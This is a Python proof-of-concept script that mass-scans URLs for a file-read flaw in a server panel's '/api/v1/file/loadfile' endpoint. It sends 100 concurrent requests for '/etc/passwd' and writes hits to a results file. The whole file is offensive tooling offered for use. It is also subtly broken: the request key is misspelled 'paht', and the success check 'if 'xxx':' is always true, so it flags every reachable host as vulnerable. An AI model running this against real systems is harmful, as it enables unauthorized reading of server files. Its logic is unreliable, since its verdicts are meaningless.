import requests,sys,argparse
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    test="""
 /$$$$$$$                               /$$         /$$                           /$$  /$$$$$$  /$$ /$$                
| $$__  $$                             | $$        | $$                          | $$ /$$__  $$|__/| $$                
| $$  \ $$ /$$$$$$  /$$$$$$$   /$$$$$$ | $$        | $$  /$$$$$$   /$$$$$$   /$$$$$$$| $$  \__/ /$$| $$  /$$$$$$       
| $$$$$$$/|____  $$| $$__  $$ /$$__  $$| $$ /$$$$$$| $$ /$$__  $$ |____  $$ /$$__  $$| $$$$    | $$| $$ /$$__  $$      
| $$____/  /$$$$$$$| $$  \ $$| $$$$$$$$| $$|______/| $$| $$  \ $$  /$$$$$$$| $$  | $$| $$_/    | $$| $$| $$$$$$$$      
| $$      /$$__  $$| $$  | $$| $$_____/| $$        | $$| $$  | $$ /$$__  $$| $$  | $$| $$      | $$| $$| $$_____/      
| $$     |  $$$$$$$| $$  | $$|  $$$$$$$| $$        | $$|  $$$$$$/|  $$$$$$$|  $$$$$$$| $$      | $$| $$|  $$$$$$$      
|__/      \_______/|__/  |__/ \_______/|__/        |__/ \______/  \_______/ \_______/|__/      |__/|__/ \_______/      
                                                                                                                       
                                                                                                                       
                                                                                                                       
"""

    print(test)



def main():
    banner()
    parser=argparse.ArgumentParser(description='Panel loadfile 后台文件读取漏洞')
    parser.add_argument('-u','--url',dest='url',type=str,help='input the url')
    parser.add_argument('-f','--file',dest='file',type=str,help='input the file')
    args=parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list=[]
        with open(args.file,'r',encoding='utf-8')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp=Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")



def poc(target):
    url_payload= '/api/v1/file/loadfile'
    headers={
        'Content-Type':'application/json'
    }
    data={"paht":"/etc/passwd"}

    try:
        res1=requests.post(url=target+url_payload,headers=headers,json=data,timeout=10)
        if 'xxx':
            print( f"[+]{target} 存在漏洞！")
            with open('result.txt','a',encoding='utf-8')as fp:
                fp.write(target+'\n')
                return True
        else:
            print('[-] 不存在漏洞')
            return False
    except:
        print('目标网站存在问题，无法访问')



if __name__ =='__main__':
    main()
